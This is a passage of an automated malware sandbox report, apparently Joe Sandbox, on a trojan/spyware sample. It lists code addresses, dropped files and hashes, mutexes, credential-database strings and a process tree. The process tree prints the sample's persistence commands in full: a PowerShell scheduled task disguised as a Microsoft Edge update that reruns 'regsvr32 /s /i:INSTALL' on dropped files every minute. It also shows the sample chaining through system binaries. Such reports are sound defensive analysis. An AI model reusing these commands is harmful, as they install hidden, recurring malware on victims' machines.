Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D5ADC 14_2_00000203FE6D5ADC
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DE398 14_2_00000203FE6DE398
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EB22CC 14_2_00007DF423EB22CC
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF3C668 15_2_000002913DF3C668
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF34660 15_2_000002913DF34660
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1D604 15_2_000002913DF1D604
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF41E08 15_2_000002913DF41E08
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2AE10 15_2_000002913DF2AE10
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF18DF4 15_2_000002913DF18DF4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1C5D4 15_2_000002913DF1C5D4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF325B4 15_2_000002913DF325B4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF29D30 15_2_000002913DF29D30
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2E51C 15_2_000002913DF2E51C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2A4F8 15_2_000002913DF2A4F8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF3C500 15_2_000002913DF3C500
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2A860 15_2_000002913DF2A860
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF29818 15_2_000002913DF29818
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1BFE4 15_2_000002913DF1BFE4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF227A4 15_2_000002913DF227A4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2F76C 15_2_000002913DF2F76C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF28EB8 15_2_000002913DF28EB8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF32254 15_2_000002913DF32254
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF33210 15_2_000002913DF33210
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF29998 15_2_000002913DF29998
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF28980 15_2_000002913DF28980
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF34144 15_2_000002913DF34144
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1BC68 15_2_000002913DF1BC68
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF253C8 15_2_000002913DF253C8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1737C 15_2_000002913DF1737C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF33B40 15_2_000002913DF33B40
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF32AA0 15_2_000002913DF32AA0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A2D24 16_2_00000260AF5A2D24
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C55B0 16_2_00000260AF5C55B0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C95D4 16_2_00000260AF5C95D4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D0D90 16_2_00000260AF5D0D90
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF592628 16_2_00000260AF592628
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C4DE8 16_2_00000260AF5C4DE8
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AF618 16_2_00000260AF5AF618
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5914D0 16_2_00000260AF5914D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C0478 16_2_00000260AF5C0478
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CECE4 16_2_00000260AF5CECE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5ADCE4 16_2_00000260AF5ADCE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B6D18 16_2_00000260AF5B6D18
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AE398 16_2_00000260AF5AE398
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D6434 16_2_00000260AF5D6434
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CCC00 16_2_00000260AF5CCC00
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A5ADC 16_2_00000260AF5A5ADC
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A7270 16_2_00000260AF5A7270
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D0270 16_2_00000260AF5D0270
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CF1D0 16_2_00000260AF5CF1D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B0174 16_2_00000260AF5B0174
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CE984 16_2_00000260AF5CE984
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C3A38 16_2_00000260AF5C3A38
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF59C25C 16_2_00000260AF59C25C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C4A50 16_2_00000260AF5C4A50
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D3A4D 16_2_00000260AF5D3A4D
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C48D0 16_2_00000260AF5C48D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5D0874 16_2_00000260AF5D0874
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B7094 16_2_00000260AF5B7094
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CF940 16_2_00000260AF5CF940
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C5918 16_2_00000260AF5C5918
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C3F70 16_2_00000260AF5C3F70
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5BD854 16_2_00000260AF5BD854
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5CA81C 16_2_00000260AF5CA81C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AD010 16_2_00000260AF5AD010
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5ABEB8 16_2_00000260AF5ABEB8
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B86B4 16_2_00000260AF5B86B4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B3EA4 16_2_00000260AF5B3EA4
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5C5EC8 16_2_00000260AF5C5EC8
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5B7684 16_2_00000260AF5B7684
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A6F24 16_2_00000260AF5A6F24
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5AC750 16_2_00000260AF5AC750
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\4smg.ini BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\oSyU.ini 55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\utox_x86_x64.exe D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97
Found potential string decryption / allocating functions
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E99D4B0 appears 72 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E987290 appears 129 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E98C9D0 appears 64 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E950EF0 appears 40 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E987030 appears 31 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E99C954 appears 41 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E987520 appears 48 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF79E907EF0 appears 224 times
PE file contains more sections than normal
Source: ajbs50ul.bat.1.dr Static PE information: Number of sections : 11 > 10
Source: 4smg.ini.3.dr Static PE information: Number of sections : 11 > 10
Source: utox_x86_x64.exe.1.dr Static PE information: Number of sections : 21 > 10
Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winPS1@28/22@3/31
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9485F0 memset,FormatMessageW,GetLastError, 3_2_00007FF79E9485F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E957140 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle, 3_2_00007FF79E957140
Source: C:\Users\user\Desktop\utox_x86_x64.exe Code function: 8_2_00614FA0 CoInitialize,CoInitialize,CoCreateInstance,CoCreateInstance,CoUninitialize,PeekMessageA,SetEvent,SetEvent,GetMessageA,GetMessageA,CoUninitialize,SetEvent,SetEvent, 8_2_00614FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\cbRHd
Source: C:\Users\user\Desktop\utox_x86_x64.exe Mutant created: \Sessions\1\BaseNamedObjects\uTox
Source: C:\Windows\System32\rekeywiz.exe Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\Jason_OsodJpavasJmnlndsto
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0rpsldo.xy0.ps1 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000B.00000003.1624834776.000001BD8778D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1629342418.000001BD8779A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: test.ps1 ReversingLabs: Detection: 23%
Source: utox_x86_x64.exe String found in binary or memory: impossible: unknown friend-add error
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: Search/Add Friends
Source: OpenWith.exe String found in binary or memory: ext-ms-win-security-authz-helper-l1-1-0.dll
Source: OpenWith.exe String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
